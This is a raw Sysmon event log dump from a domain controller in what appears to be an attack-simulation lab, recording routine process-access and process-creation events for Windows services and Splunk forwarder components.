13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.066{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.158{59A5CD1D-92EB-6005-C504-00000000A301}51163804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.830{59A5CD1D-92EC-6005-C704-00000000A301}28203224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
